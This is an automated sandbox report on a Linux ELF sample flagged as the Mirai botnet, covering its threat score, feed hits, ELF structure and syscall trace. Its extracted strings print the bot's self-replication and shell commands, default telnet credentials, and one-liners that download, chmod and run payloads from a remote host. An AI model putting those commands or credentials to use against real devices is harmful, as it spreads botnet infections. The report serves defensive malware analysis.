Malwagon
I486
iran.i486 File Analysis · submitted Sep 7, 2026 21:42 · 98.1 KB
229files 5IOCs
Malicious80 Linux Completed Public
Get sample Report Sign in

Malicious

80/100

10 points past the malicious line at 70.

Clean0-34 Suspicious35-69 Malicious70-100

Why this verdict

+80
Threat intelligence
  • MalwareBazaar known sample: Mirai
  • Known malicious hash (feed): urlhaus: malware payload (elf)

Analysis layers

Static ran no points
Dynamic ran no points
Threat intel ran moved the score
AI ran no points

Sample

TypeFile Linux
MIMEapplication/x-executable

Run conditions

Sandbox OSUbuntu 24.04 (Linux sandbox)
InternetIsolated

Malware family

0 independent sources
malware payload (elf) possible

Named by a single source. Treat it as a lead rather than a classification.

LayerSourceWhat it matched
hash_feed rule corpus urlhaus: malware payload (elf)

Detection signatures

1 detected
Severity Detection Evidence Layer
MED
Exfiltration / C2 endpoint strings
MITRE T1041
string user-agent: matched string
static

Structure

What the file is made of: headers, imports, how it was built and whether it was signed.

Signature
Unknown
No compiler or packer signature matched this file.
Not packed
Identity
File
typeELF 32-bit LSB executable, Intel 80386, version 1 (SYSV)
size98.1 KB
entropy6.3994
Packing
Not packed
The file's code is readable on disk - nothing is compressed or encrypted around it.
0/100
packer confidence
Static analysis reads this file directly Nothing is hiding the code from a static pass, so what the file contains is what the report shows.
Indicators weighed

Packer detection looks at a program's entry point, sections and entropy. This file is not a program image, so there was nothing of that kind to assess.

Secrets & malicious strings

1 flagged string

Flagged string categories

exfiltration / C2 med 1 hit
IndicatorFound inEvidence from the sample
user-agent: extracted string User-Agent: %s

ELF header

x86 · 32-bit
TypeET_EXEC
Machinex86 (little-endian)
Entry point0x8048164
Interpreternone (static)
Linkage static stripped
Hardening NX

ELF sections

11 total
NameTypeSizeFlagsEntropy
-SHT_NULL0.0 B -
.initSHT_PROGBITS17.0 B ALLOCEXECINSTR
3.2639
.textSHT_PROGBITS90.3 KB ALLOCEXECINSTR
6.3444
.finiSHT_PROGBITS12.0 B ALLOCEXECINSTR
3.2516
.rodataSHT_PROGBITS6.5 KB ALLOC
5.5005
.ctorsSHT_PROGBITS8.0 B WRITEALLOC
1.0
.dtorsSHT_PROGBITS8.0 B WRITEALLOC
1.0
.gotSHT_PROGBITS4.0 B WRITEALLOC
2.0
.dataSHT_PROGBITS360.0 B WRITEALLOC
3.1265
.bssSHT_NOBITS1.0 MB WRITEALLOC -
.shstrtabSHT_STRTAB67.0 B
3.6129

Needed libraries

0

No dynamic dependencies (static binary).

Imported symbols

0
-

YARA matches

1 finding · 0 scored
Rule What it matched Corpus Weight
maldoc_getEIP_method_1
maldoc
The rule carries no description.
1 of 1 string matched
$a \xe8\x00\x00\x00\x00Z at 0x116 · 2 hits
Tier 3 - community corpus
casts no family vote; every measured false family match came from here
SCORED 0
Scored 0: the rule declares no category. Only anti-vm, anti-debug, dropper and packer matches carry weight.

None of the rules above moved the score. The score model reads four rule categories - anti-vm, anti-debug, dropper and packer - and a rule outside them can match, and be worth reading, without being evidence the verdict is built on.

Extracted strings

showing 200 of 228
  • !SQPR
  • XZho
  • T$4RPh
  • !QSPR
  • l$LUW
  • WPRV
  • uskC
  • PPUS
  • <%u`
  • /proc
  • /proc/%s/comm
  • /etc/init.d
  • /etc/init.d/xs.main
  • %s %s
  • /etc/rc.local
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110
  • Host: %s
  • User-Agent: %s
  • Connection: keep-alive
  • POST / HTTP/1.1
  • Content-Type: application/x-www-form-urlencoded
  • Content-Length: 16
  • data=random_data
  • HEAD / HTTP/1.1
  • /proc/%s/cmdline
  • wget
  • /proc/%d/comm
  • /proc/%d/stat
  • %*d %*s %*c %d
  • s6-supervise
  • /proc/%s/stat
  • /proc/%s/exe
  • /proc/%s/status
  • /proc/%s/fd/0
  • %llx
  • (deleted)
  • /proc/%d/task/%d/children
  • s6-linux-init
  • systemd
  • supervisord
  • cron
  • daemon
  • dbus
  • login
  • sshd
  • curl
  • ftpget
  • /usr/bin/
  • /usr/sbin/
  • /usr/local/bin/
  • /usr/local/sbin/
  • /usr/lib/
  • /usr/lib64/
  • /var/lib/
  • /usr/share/
  • /fhrom/
  • /fhrom/fhshell/
  • /fhrom/bin/
  • /proc/self/exe
  • /sbin/init
  • /package/admin/
  • /package/
  • /command/
  • /dev/watchdog
  • /dev/misc/watchdog
  • /usr/bin/watchdogd
  • /usr/sbin/watchdog
  • /bin/sw_watchdog
  • /dev/watchdog0
  • /dev/watchdog1
  • Not a mirai at all
  • Death to israel
  • stop
  • !kill
  • ping
  • pong %s
  • !selfrep telnet
  • !selfrep realtek
  • !openshell
  • !shellcmd
  • %s 2>&1
  • !update
  • icmp
  • psize=
  • httpmode=
  • gport=
  • gre_proto=
  • usleep=
  • udpplain
  • default
  • %u.%d.%d.%d
  • orf; cd /tmp; /bin/busybox wget http://%s/mipsel; chmod 777 mipsel; ./mipsel selfrep.realtek; /bin/busybox wget http://%s/mips; chmod 777 mips; ./mips selfrep.realtek
  • [0mPassword:
  • [0mAccess granted!
  • [0mWrong password!
  • --norc
  • --noprofile
  • /bin/bash
  • /bin/sh
  • [0mNo shell available
  • Password:
  • password:
  • root
  • user
  • postgres
  • password
  • anko
  • dreambox
  • Login:
  • login:
  • username:
  • Username:
  • cd /tmp || cd /var || cd /dev/shm;wget http://%s/telnet.sh; curl -O http://%s/telnet.sh; chmod 777 telnet.sh; sh telnet.sh;
  • %s/%s
  • /proc/self/cmdline
  • GET /%s HTTP/1.0
  • Connection: close
  • /dev/null
  • %d.%d.%d.%d
  • /etc/hosts
  • /etc/services
  • /etc/resolv.conf
  • options
  • timeout:
  • attempts:
  • nameserver
  • 0123456789ABCDEF-+ 0X0x
  • (null)
  • __vdso_clock_gettime
  • LINUX_2.6
  • Illegal byte sequence
  • Domain error
  • Result not representable
  • Not a tty
  • Permission denied
  • Operation not permitted
  • No such file or directory
  • No such process
  • File exists
  • Value too large for data type
  • No space left on device
  • Out of memory
  • Resource busy
  • Interrupted system call
  • Resource temporarily unavailable
  • Invalid seek
  • Cross-device link
  • Read-only file system
  • Directory not empty
  • Connection reset by peer
  • Operation timed out
  • Connection refused
  • Host is down
  • Host is unreachable
  • Address in use
  • Broken pipe
  • I/O error
  • No such device or address
  • Block device required
  • No such device
  • Not a directory
  • Is a directory
  • Text file busy
  • Exec format error
  • Invalid argument
  • Argument list too long
  • Symbolic link loop
  • Filename too long
  • Too many open files in system
  • No file descriptors available
  • Bad file descriptor
  • No child process
  • Bad address
  • File too large
  • Too many links
  • No locks available
  • Resource deadlock would occur
  • State not recoverable
  • Previous owner died
  • Operation canceled
  • Function not implemented
  • No message of desired type
  • Identifier removed
  • Device not a stream
  • No data available
  • Device timeout
  • Out of streams resources
  • Link has been severed
  • Protocol error
  • Bad message
  • File descriptor in bad state
  • Not a socket
  • Destination address required
  • Message too large
  • Protocol wrong type for socket
  • Protocol not available
  • Protocol not supported
  • Socket type not supported
  • Not supported
  • Protocol family not supported

Stack and decoded strings were not recovered: string emulation failed on this file. Only literal strings present in the file are listed above.

VM console

headless guest

The Linux sandbox runs a server image with no desktop, so there is no screen to record - this is the boot console, kept because a kernel panic or an out-of-memory kill would show up here and in no other layer. What the sample did is under Behavior, File & registry and Network, captured from the syscall trace rather than from pixels.

VM console

Behavior summary

no notable behavior observed

Launched/var/tmp/iran.i486

Syscall summary

top calls
open229
socket1
readlink31
shutdown1
exit_group2
setsockopt1

Persistence & evasion

No persistence or evasion behavior observed.

No network activity - the run was isolated

This detonation was given no internet connection, so a sample that wanted to reach out could not. An empty section here says nothing about whether it tried.

Process tree

What ran during the detonation, and what each process did. Select a node to see the activity attributed to it.

No processes were captured

This run recorded no process activity. A hash lookup and a URL analysis never open a Windows VM, and a detonation that produced no telemetry says so on the report.

0Mechanisms found
90Methods checked
0ATT&CK techniques
NONEHighest severity

Established mechanisms

clean

No persistence established

None of the 90 auto-start methods below were established during this run.

Detection coverage

0 / 90

Every auto-start method checked on this sample, grouped by family. A method with no result is reported clean.

Logon & Startup 22 clean
  • Active Setup Installed Component T1547.014 clean
  • Explorer Delay-Load Object T1547.001 clean
  • Explorer Run Key T1547.001 clean
  • Explorer SharedTaskScheduler T1547.001 clean
  • Group Policy Extension DLL T1547.004 clean
  • Group Policy Run Key T1547.001 clean
  • Logon Script T1037.001 clean
  • RDP WDS Startup Program T1547.001 clean
  • Registry Run Key T1547.001 clean
  • Registry RunEx Key T1547.001 clean
  • Registry RunOnce Key T1547.001 clean
  • Registry RunOnceEx Key T1547.001 clean
  • Registry RunServices Key T1547.001 clean
  • Startup Folder Item T1547.001 clean
  • Startup Folder Redirection T1547.001 clean
  • Terminal Services Initial Program T1547.001 clean
  • Winlogon GINA DLL T1547.004 clean
  • Winlogon MPNotify Value T1547.004 clean
  • Winlogon Notify Package T1547.004 clean
  • Winlogon Shell Value T1547.004 clean
  • Winlogon Taskman Value T1547.004 clean
  • Winlogon Userinit Value T1547.004 clean
Services & Tasks 9 clean
  • BITS Job T1197 clean
  • Print Monitor DLL T1547.010 clean
  • Print Processor DLL T1547.012 clean
  • Scheduled Task T1053.005 clean
  • Scheduled Task Registry Implant T1053.005 clean
  • Service Control Manager Security Descriptor T1574.011 clean
  • Service DLL Hijack T1543.003 clean
  • Time Provider DLL T1547.003 clean
  • Windows Service Creation T1543.003 clean
Execution Hijack 17 clean
  • .NET Managed Debugger T1546.012 clean
  • Accessibility Tool Hijack T1546.008 clean
  • AeDebug Postmortem Debugger T1546.012 clean
  • App Paths Hijack T1546.012 clean
  • Application Shim Database T1546.011 clean
  • Boot Verification Program T1547.002 clean
  • Command Processor AutoRun T1546.011 clean
  • Explorer Load Value T1547.001 clean
  • Explorer MyComputer Tool Hijack T1546.001 clean
  • Registry Image File Execution Options T1546.012 clean
  • Screensaver Hijack T1546.002 clean
  • Setup ErrorHandler Script T1546 clean
  • Shell Open Command Hijack T1546.001 clean
  • SilentProcessExit Monitor T1546.012 clean
  • Telemetry Controller Command T1546.015 clean
  • WER ReflectDebugger T1546.012 clean
  • Windows Error Reporting Debugger T1546.012 clean
DLL Load Order 12 clean
  • .NET CLR Profiler DLL T1574.012 clean
  • .NET Startup Hook DLL T1574 clean
  • AppCert DLLs T1546.009 clean
  • AppInit DLLs T1546.010 clean
  • AutodialDLL Winsock Injection T1546.006 clean
  • DLL Search-Order Hijack T1574.001 T1574.002 clean
  • DNS Server Plugin DLL T1574.001 clean
  • HTML Help Helper DLL T1546 clean
  • KnownDLLs Manipulation T1574.001 clean
  • Natural Language Platform DLL Override T1546 clean
  • Netsh Helper DLL T1546.007 clean
  • Winsock Layered Service Provider T1546.006 clean
COM & Browser 6 clean
  • Browser Extension T1176 clean
  • Browser Helper Object T1176 clean
  • COM Server Hijack T1546.015 clean
  • HTML Help COM Object Hijack T1546.015 clean
  • Shell Context Menu Handler T1546.001 clean
  • Shell Extension Handler T1546.001 clean
Security Providers & Accounts 11 clean
  • Account RID Hijack T1098 clean
  • AMSI Provider T1562.001 clean
  • Credential Provider T1547.014 clean
  • DSRM Admin Logon Backdoor T1556 clean
  • Hidden Local Account T1136.001 clean
  • LSA Authentication Package T1547.002 clean
  • LSA Extension DLL T1547.005 clean
  • LSA Notification Package T1547.005 clean
  • LSA Security Package T1547.005 clean
  • Network Provider DLL T1556.008 clean
  • Security Support Provider T1547.005 clean
Scripting & Applications 9 clean
  • Netsh Port Proxy T1090.001 clean
  • Office Add-in T1137.006 clean
  • Office Executable Sideload T1574.002 clean
  • Office Startup Template T1137.001 clean
  • Office Test Key T1137.002 clean
  • Power Automate Flow T1546 clean
  • PowerShell Profile T1546.013 clean
  • Windows Terminal Startup Action T1546 clean
  • WMI Event Subscription T1546.003 clean
Boot & Firmware 4 clean
  • BootExecute Native Image T1547.002 clean
  • PlatformExecute Native Image T1547.002 clean
  • SetupExecute Native Image T1547.002 clean
  • UEFI / Bootkit Artifact T1542.003 T1542.001 clean

File activity summary

create 0 write 0 modify 0 delete 0 rename 0

File & registry ops

229 file · 0 registry · sample scope
OperationTargetProcess
read
/proc/149/cmdline
syscall_trace
- pid 685 21:49:34.949873
read
/proc/150/cmdline
syscall_trace
- pid 685 21:49:34.951160
read
/proc/151/cmdline
syscall_trace
- pid 685 21:49:34.952521
read
/proc/152/cmdline
syscall_trace
- pid 685 21:49:34.953678
read
/proc/153/cmdline
syscall_trace
- pid 685 21:49:34.955159
read
/proc/154/cmdline
syscall_trace
- pid 685 21:49:34.956385
read
/proc/155/cmdline
syscall_trace
- pid 685 21:49:34.957512
read
/proc/156/cmdline
syscall_trace
- pid 685 21:49:34.958736
read
/proc/157/cmdline
syscall_trace
- pid 685 21:49:34.960016
read
/proc/158/cmdline
syscall_trace
- pid 685 21:49:34.961250
read
/proc/159/cmdline
syscall_trace
- pid 685 21:49:34.962429
read
/proc/160/cmdline
syscall_trace
- pid 685 21:49:34.963501
read
/proc/161/cmdline
syscall_trace
- pid 685 21:49:34.964875
read
/proc/162/cmdline
syscall_trace
- pid 685 21:49:34.966182
read
/proc/163/cmdline
syscall_trace
- pid 685 21:49:34.967622
read
/proc/164/cmdline
syscall_trace
- pid 685 21:49:34.968978
read
/proc/192/cmdline
syscall_trace
- pid 685 21:49:34.970357
read
/proc/229/cmdline
syscall_trace
- pid 685 21:49:34.971394
read
/proc/230/cmdline
syscall_trace
- pid 685 21:49:34.972445
read
/proc/289/cmdline
syscall_trace
- pid 685 21:49:34.973994
read
/proc/294/cmdline
syscall_trace
- pid 685 21:49:34.974998
read
/proc/326/cmdline
syscall_trace
- pid 685 21:49:34.976114
read
/proc/327/cmdline
syscall_trace
- pid 685 21:49:34.977202
read
/proc/355/cmdline
syscall_trace
- pid 685 21:49:34.978260
read
/proc/370/cmdline
syscall_trace
- pid 685 21:49:34.979234
read
/proc/395/cmdline
syscall_trace
- pid 685 21:49:34.980261
read
/proc/433/cmdline
syscall_trace
- pid 685 21:49:34.981236
read
/proc/442/cmdline
syscall_trace
- pid 685 21:49:34.982256
read
/proc/500/cmdline
syscall_trace
- pid 685 21:49:34.983253
read
/proc/535/cmdline
syscall_trace
- pid 685 21:49:34.984408
read
/proc/540/cmdline
syscall_trace
- pid 685 21:49:34.985713
read
/proc/541/cmdline
syscall_trace
- pid 685 21:49:34.986915
read
/proc/566/cmdline
syscall_trace
- pid 685 21:49:34.988316
read
/proc/593/cmdline
syscall_trace
- pid 685 21:49:34.989410
read
/proc/676/cmdline
syscall_trace
- pid 685 21:49:34.990545
read
/proc/678/cmdline
syscall_trace
- pid 685 21:49:34.991897
read
/proc/683/cmdline
syscall_trace
- pid 685 21:49:34.993217
read
/proc/684/cmdline
syscall_trace
- pid 685 21:49:34.994499
read
/proc/684/stat
syscall_trace
- pid 685 21:49:34.996889
read
/proc/683/stat
syscall_trace
- pid 685 21:49:34.998402
read
/proc/566/comm
syscall_trace
- pid 685 21:49:34.999938
read
/proc/566/comm
syscall_trace
- pid 685 21:49:35.001006
read
/proc/566/stat
syscall_trace
- pid 685 21:49:35.002075
read
/proc/566/status
syscall_trace
- pid 685 21:49:35.003879
read
/proc/566/comm
syscall_trace
- pid 685 21:49:35.005390
read
/proc/566/cmdline
syscall_trace
- pid 685 21:49:35.006405
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.008000
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.009214
read
/proc/593/comm
syscall_trace
- pid 685 21:49:35.010604
read
/proc/593/comm
syscall_trace
- pid 685 21:49:35.011916
read
/proc/593/stat
syscall_trace
- pid 685 21:49:35.012895
read
/proc/593/status
syscall_trace
- pid 685 21:49:35.014654
read
/proc/593/comm
syscall_trace
- pid 685 21:49:35.016351
read
/proc/593/cmdline
syscall_trace
- pid 685 21:49:35.017439
read
/proc/593/stat
syscall_trace
- pid 685 21:49:35.019253
read
/proc/593/status
syscall_trace
- pid 685 21:49:35.020566
read
/proc/593/exe
syscall_trace
- pid 685 21:49:35.022712
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.023771
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.025165
read
/proc/676/comm
syscall_trace
- pid 685 21:49:35.026499
read
/proc/676/comm
syscall_trace
- pid 685 21:49:35.027517
read
/proc/676/stat
syscall_trace
- pid 685 21:49:35.028590
read
/proc/676/status
syscall_trace
- pid 685 21:49:35.030459
read
/proc/676/comm
syscall_trace
- pid 685 21:49:35.032228
read
/proc/676/cmdline
syscall_trace
- pid 685 21:49:35.033724
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.036157
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.037928
read
/proc/678/comm
syscall_trace
- pid 685 21:49:35.039913
read
/proc/678/comm
syscall_trace
- pid 685 21:49:35.041358
read
/proc/678/stat
syscall_trace
- pid 685 21:49:35.042681
read
/proc/678/status
syscall_trace
- pid 685 21:49:35.044623
read
/proc/678/comm
syscall_trace
- pid 685 21:49:35.046187
read
/proc/678/cmdline
syscall_trace
- pid 685 21:49:35.047309
read
/proc
syscall_trace
- pid 685 21:49:35.301284
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.302740
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.304027
read
/proc/2/comm
syscall_trace
- pid 685 21:49:35.305424
read
/proc/2/comm
syscall_trace
- pid 685 21:49:35.306524
read
/proc/2/stat
syscall_trace
- pid 685 21:49:35.307736
read
/proc/2/status
syscall_trace
- pid 685 21:49:35.309742
read
/proc/2/comm
syscall_trace
- pid 685 21:49:35.311361
read
/proc/2/cmdline
syscall_trace
- pid 685 21:49:35.312420
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.313710
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.315004
read
/proc/3/comm
syscall_trace
- pid 685 21:49:35.316343
read
/proc/3/comm
syscall_trace
- pid 685 21:49:35.317350
read
/proc/3/stat
syscall_trace
- pid 685 21:49:35.318348
read
/proc/3/status
syscall_trace
- pid 685 21:49:35.319961
read
/proc/3/comm
syscall_trace
- pid 685 21:49:35.321645
read
/proc/3/cmdline
syscall_trace
- pid 685 21:49:35.322681
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.323916
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.325130
read
/proc/4/comm
syscall_trace
- pid 685 21:49:35.326487
read
/proc/4/comm
syscall_trace
- pid 685 21:49:35.327372
read
/proc/4/stat
syscall_trace
- pid 685 21:49:35.328436
read
/proc/4/status
syscall_trace
- pid 685 21:49:35.330216
read
/proc/4/comm
syscall_trace
- pid 685 21:49:35.331935
read
/proc/4/cmdline
syscall_trace
- pid 685 21:49:35.332942
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.334726
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.336074
read
/proc/5/comm
syscall_trace
- pid 685 21:49:35.337496
read
/proc/5/comm
syscall_trace
- pid 685 21:49:35.338582
read
/proc/5/stat
syscall_trace
- pid 685 21:49:35.339663
read
/proc/5/status
syscall_trace
- pid 685 21:49:35.341280
read
/proc/5/comm
syscall_trace
- pid 685 21:49:35.343037
read
/proc/5/cmdline
syscall_trace
- pid 685 21:49:35.344109
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.345525
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.346928
read
/proc/6/comm
syscall_trace
- pid 685 21:49:35.348349
read
/proc/6/comm
syscall_trace
- pid 685 21:49:35.349357
read
/proc/6/stat
syscall_trace
- pid 685 21:49:35.350433
read
/proc/6/status
syscall_trace
- pid 685 21:49:35.352287
read
/proc/6/comm
syscall_trace
- pid 685 21:49:35.354008
read
/proc/6/cmdline
syscall_trace
- pid 685 21:49:35.354909
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.356266
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.357558
read
/proc/7/comm
syscall_trace
- pid 685 21:49:35.358925
read
/proc/7/comm
syscall_trace
- pid 685 21:49:35.359899
read
/proc/7/stat
syscall_trace
- pid 685 21:49:35.361088
read
/proc/7/status
syscall_trace
- pid 685 21:49:35.362767
read
/proc/7/comm
syscall_trace
- pid 685 21:49:35.364492
read
/proc/7/cmdline
syscall_trace
- pid 685 21:49:35.365376
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.366706
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.368321
read
/proc/8/comm
syscall_trace
- pid 685 21:49:35.369745
read
/proc/8/comm
syscall_trace
- pid 685 21:49:35.370742
read
/proc/8/stat
syscall_trace
- pid 685 21:49:35.371655
read
/proc/8/status
syscall_trace
- pid 685 21:49:35.373377
read
/proc/8/comm
syscall_trace
- pid 685 21:49:35.375191
read
/proc/8/cmdline
syscall_trace
- pid 685 21:49:35.376194
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.377646
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.379004
read
/proc/9/comm
syscall_trace
- pid 685 21:49:35.380348
read
/proc/9/comm
syscall_trace
- pid 685 21:49:35.381357
read
/proc/9/stat
syscall_trace
- pid 685 21:49:35.382421
read
/proc/9/status
syscall_trace
- pid 685 21:49:35.384122
read
/proc/9/comm
syscall_trace
- pid 685 21:49:35.385516
read
/proc/9/cmdline
syscall_trace
- pid 685 21:49:35.386910
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.388774
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.390454
read
/proc/10/comm
syscall_trace
- pid 685 21:49:35.392121
read
/proc/10/comm
syscall_trace
- pid 685 21:49:35.393529
read
/proc/10/stat
syscall_trace
- pid 685 21:49:35.394871
read
/proc/10/status
syscall_trace
- pid 685 21:49:35.397238
read
/proc/10/comm
syscall_trace
- pid 685 21:49:35.399460
read
/proc/10/cmdline
syscall_trace
- pid 685 21:49:35.400692
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.402068
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.403342
read
/proc/11/comm
syscall_trace
- pid 685 21:49:35.404938
read
/proc/11/comm
syscall_trace
- pid 685 21:49:35.406028
read
/proc/11/stat
syscall_trace
- pid 685 21:49:35.406949
read
/proc/11/status
syscall_trace
- pid 685 21:49:35.408853
read
/proc/11/comm
syscall_trace
- pid 685 21:49:35.410722
read
/proc/11/cmdline
syscall_trace
- pid 685 21:49:35.411909
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.413401
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.414864
read
/proc/12/comm
syscall_trace
- pid 685 21:49:35.416371
read
/proc/12/comm
syscall_trace
- pid 685 21:49:35.417461
read
/proc/12/stat
syscall_trace
- pid 685 21:49:35.418551
read
/proc/12/status
syscall_trace
- pid 685 21:49:35.420242
read
/proc/12/comm
syscall_trace
- pid 685 21:49:35.422129
read
/proc/12/cmdline
syscall_trace
- pid 685 21:49:35.423235
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.424641
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.426095
read
/proc/13/comm
syscall_trace
- pid 685 21:49:35.427530
read
/proc/13/comm
syscall_trace
- pid 685 21:49:35.428738
read
/proc/13/stat
syscall_trace
- pid 685 21:49:35.429969
read
/proc/13/status
syscall_trace
- pid 685 21:49:35.431883
read
/proc/13/comm
syscall_trace
- pid 685 21:49:35.433720
read
/proc/13/cmdline
syscall_trace
- pid 685 21:49:35.434844
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.436278
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.437745
read
/proc/14/comm
syscall_trace
- pid 685 21:49:35.439116
read
/proc/14/comm
syscall_trace
- pid 685 21:49:35.440212
read
/proc/14/stat
syscall_trace
- pid 685 21:49:35.441107
read
/proc/14/status
syscall_trace
- pid 685 21:49:35.442937
read
/proc/14/comm
syscall_trace
- pid 685 21:49:35.444714
read
/proc/14/cmdline
syscall_trace
- pid 685 21:49:35.445901
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.447378
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.448725
read
/proc/15/comm
syscall_trace
- pid 685 21:49:35.450221
read
/proc/15/comm
syscall_trace
- pid 685 21:49:35.451380
read
/proc/15/stat
syscall_trace
- pid 685 21:49:35.452328
read
/proc/15/status
syscall_trace
- pid 685 21:49:35.454289
read
/proc/15/comm
syscall_trace
- pid 685 21:49:35.456122
read
/proc/15/cmdline
syscall_trace
- pid 685 21:49:35.457204
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.458663
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.460297
read
/proc/16/comm
syscall_trace
- pid 685 21:49:35.461717
read
/proc/16/comm
syscall_trace
- pid 685 21:49:35.462912
read
/proc/16/stat
syscall_trace
- pid 685 21:49:35.464048
read
/proc/16/status
syscall_trace
- pid 685 21:49:35.465930
read
/proc/16/comm
syscall_trace
- pid 685 21:49:35.467573
read
/proc/16/cmdline
syscall_trace
- pid 685 21:49:35.468688
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.470219
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.471604
read
/proc/17/comm
syscall_trace
- pid 685 21:49:35.473096
read
/proc/17/comm
syscall_trace
- pid 685 21:49:35.474196
read
/proc/17/stat
syscall_trace
- pid 685 21:49:35.475276
read
/proc/17/status
syscall_trace
- pid 685 21:49:35.477178
read
/proc/17/comm
syscall_trace
- pid 685 21:49:35.478592
read
/proc/17/cmdline
syscall_trace
- pid 685 21:49:35.479380
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.481280
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.482660
read
/proc/18/comm
syscall_trace
- pid 685 21:49:35.483997
read
/proc/18/comm
syscall_trace
- pid 685 21:49:35.484981
read
/proc/18/stat
syscall_trace
- pid 685 21:49:35.485977
read
/proc/18/status
syscall_trace
- pid 685 21:49:35.487696
read
/proc/18/comm
syscall_trace
- pid 685 21:49:35.489642
read
/proc/18/cmdline
syscall_trace
- pid 685 21:49:35.490673
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.492077
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.493362
read
/proc/19/comm
syscall_trace
- pid 685 21:49:35.494753
read
/proc/19/comm
syscall_trace
- pid 685 21:49:35.495752
read
/proc/19/stat
syscall_trace
- pid 685 21:49:35.496756
read
/proc/19/status
syscall_trace
- pid 685 21:49:35.498451
read
/proc/19/comm
syscall_trace
- pid 685 21:49:35.500335
read
/proc/19/cmdline
syscall_trace
- pid 685 21:49:35.501386
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.502979
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.504561
read
/proc/20/comm
syscall_trace
- pid 685 21:49:35.506406
read
/proc/20/comm
syscall_trace
- pid 685 21:49:35.507659
read
/proc/20/stat
syscall_trace
- pid 685 21:49:35.509056
read
/proc/20/status
syscall_trace
- pid 685 21:49:35.511302
read
/proc/20/comm
syscall_trace
- pid 685 21:49:35.513008
read
/proc/20/cmdline
syscall_trace
- pid 685 21:49:35.514090
read
/proc/684/stat
syscall_trace
- pid 685 21:49:35.515517
read
/proc/683/stat
syscall_trace
- pid 685 21:49:35.516974
read
/proc/21/stat
syscall_trace
- pid 685 21:49:35.520219
3 reported a hit 16 answered no 1 could not answer 3 had nothing to check
3Sources with a hit
20Sources queriedof 23 available
486.1kFeed records
1Could not answer

File reputation

2 of 7 listed
SourceChecksResultDetailFeed
MalwareBazaar File hash Mirai elf live lookup
URLhaus payload hashes File hash listed urlhaus: Mirai 1,474 records
6 minutes ago
VirusTotal File hash cannot access rate limited (free-tier quota) live lookup
filescan.io File hash no detections - live lookup
MalwareBazaar hash feed File hash clean not in feed 2,535 records
6 minutes ago
MalwareBazaar ransomware feed File hash clean not in feed 8,271 records
4 hours ago
ThreatFox hash IOCs File hash clean not in feed 1,632 records
6 minutes ago

Hash lookups only - the sample itself is never uploaded to any third party.

Network indicators

8 clear
SourceChecksResultDetailFeed
blocklist.de IP / domain / URL clean 3 observed indicators, none listed 24.5k records
6 minutes ago
CINS Army IP / domain / URL clean 3 observed indicators, none listed 15k records
6 minutes ago
Emerging Threats IP / domain / URL clean 3 observed indicators, none listed 580 records
6 minutes ago
Feodo Tracker IP / domain / URL clean 3 observed indicators, none listed 5 records
6 minutes ago
IPsum IP / domain / URL clean 3 observed indicators, none listed 17.7k records
6 minutes ago
Phishing.Database IP / domain / URL clean 3 observed indicators, none listed 391.1k records
4 hours ago
ThreatFox IP / domain / URL clean 3 observed indicators, none listed 1,632 records
6 minutes ago
URLhaus IP / domain / URL clean 3 observed indicators, none listed 5,155 records
6 minutes ago

TLS fingerprints

0 clear
SourceChecksResultDetailFeed
abuse.ch JA3 blocklist JA3 / JA4 not checked no TLS client fingerprint observed 97 records
16 hours ago
SSL blocklist JA3 / JA4 not checked no TLS client fingerprint observed 10.7k records
6 minutes ago

Detection rules

1 of 2 listed
SourceChecksResultDetailFeed
YARA rules Sample content 1 match maldoc_getEIP_method_1 110 records
6 minutes ago
Sigma rules Behavior log clean - 2,275 records
22 hours ago

Tooling catalogs

3 clear
SourceChecksResultDetailFeed
LOLBootloaders File hash clean not a known vulnerable bootloader 520 records
5 minutes ago
LOLDrivers File hash clean not a known vulnerable driver 2,306 records
6 minutes ago
LOLRMM Names and domains clean 1 name/domain indicator checked, no remote-management tooling 322 records
5 minutes ago
LOLBAS Process image paths not checked no process image path observed to check 244 records
6 minutes ago

Analyst narrative

